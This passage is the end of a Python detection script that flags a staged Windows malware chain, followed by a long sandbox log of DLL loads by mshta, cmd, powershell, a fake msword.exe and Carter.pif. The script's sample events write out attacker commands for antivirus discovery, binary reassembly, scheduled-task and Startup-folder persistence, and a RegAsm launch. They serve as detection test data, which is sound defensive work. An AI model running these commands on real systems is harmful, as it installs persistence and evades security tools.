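JS_PATH = r"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
SCR_PATH = r"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr"
STARTUP_URL = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url"
CMD = r"C:\Windows\SysWOW64\cmd.exe"

SAMPLE_EVENTS = [  # constructed, modelled on the report (assumption)
    ProcEvent(CMD, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    ProcEvent(CMD, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "wrsa opssvc"'),
    ProcEvent(CMD, r"C:\Windows\SysWOW64\findstr.exe",
              'findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"'),
    ProcEvent(CMD, CMD, r"cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F"),
    ProcEvent(CMD, TEMP + r"\Carter.pif", "Carter.pif F"),
    ProcEvent(TEMP + r"\Carter.pif", CMD,
              f'cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B \'{JS_PATH}\'" /sc minute /mo 5 /F'),
    ProcEvent(TEMP + r"\Carter.pif", CMD,
              f'cmd /k echo [InternetShortcut] > "{STARTUP_URL}" & echo URL="{JS_PATH}" >> "{STARTUP_URL}" & exit'),
    ProcEvent(TEMP + r"\Carter.pif", TEMP + r"\RegAsm.exe", TEMP + r"\RegAsm.exe"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", SCR_PATH, f'"{SCR_PATH}" "C:\\Users\\user\\AppData\\Local\\CloudSynergy Solutions\\R"'),
    # Benign control: an admin grepping a build log must not fire anything.
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\findstr.exe", 'findstr /I "error" build.log'),
]

# Process names the sample searched for (from the report's findstr arguments).
AV_PROCESS_NAMES = {"wrsa", "opssvc", "avastui", "avgui", "bdservicehost", "nswscsvc", "sophoshealth"}
# Extensions that run as PE but are rarely legitimate in user-writable paths.
RENAMED_PE_EXT = (".pif", ".scr", ".com")


def base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def in_user_writable(path: str) -> bool:
    p = path.lower()
    return "\\appdata\\" in p or "\\users\\public\\" in p or "\\programdata\\" in p


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    hits: list[str] = []
    img, parent, cl = base(ev.image), base(ev.parent), ev.cmdline.lower()

    # 1. Security-product discovery: case-insensitive findstr for known AV process names.
    if img == "findstr.exe" and re.search(r"(?:/|-)i\b", cl):
        if set(re.findall(r"[a-z0-9]+", cl)) & AV_PROCESS_NAMES:
            hits.append("av_discovery")
    # 2. Binary reassembly: copy /b with '+' joins split chunks into one file.
    if re.search(r"\bcopy\s+/b\b.*\+", cl):
        hits.append("binary_concat")
    # 3. Renamed PE (.pif/.scr/.com) executing from a user-writable location.
    if img.endswith(RENAMED_PE_EXT) and in_user_writable(ev.image):
        hits.append("renamed_pe_user_writable")
    # 4. Persistence: scheduled task whose action is wscript in batch mode (//B).
    if "schtasks" in cl and "/create" in cl and re.search(r"wscript(?:\.exe)?\s+//b\b", cl):
        hits.append("schtask_wscript_batch")
    # 5. Persistence: .url written into the Startup folder via echo redirection.
    if "[internetshortcut]" in cl and "\\startup\\" in cl and ".url" in cl:
        hits.append("startup_url_drop")
    # 6. RegAsm.exe started from anywhere but the .NET Framework directory.
    if img == "regasm.exe" and "\\microsoft.net\\framework" not in ev.image.lower():
        hits.append("regasm_outside_framework")
    # 7. A script host launching a renamed PE.
    if parent == "wscript.exe" and img.endswith(RENAMED_PE_EXT):
        hits.append("script_host_spawns_renamed_pe")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[str, str]]:
    """(rule, image) pairs for every match across the event stream."""
    return [(rule, ev.image) for ev in events for rule in classify(ev)]


def distinct_rules(events: list[ProcEvent]) -> set[str]:
    return {rule for rule, _ in scan(events)}


def is_staged_chain(events: list[ProcEvent], threshold: int = 3) -> bool:
    """Any single rule can fire on odd admin activity; several distinct ones
    in one process tree are the signal. Threshold is an assumption."""
    return len(distinct_rules(events)) >= threshold


if __name__ == "__main__":
    for rule, image in scan(SAMPLE_EVENTS):
        print(f"{rule:32} {image}")
    print("staged chain:", is_staged_chain(SAMPLE_EVENTS))
```

On real telemetry the events would be grouped per process tree (by ProcessGuid/ParentProcessGuid) before `is_staged_chain` is evaluated, so that unrelated admin activity elsewhere on the host does not inflate the count.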
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msdart.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: wsock32.dll
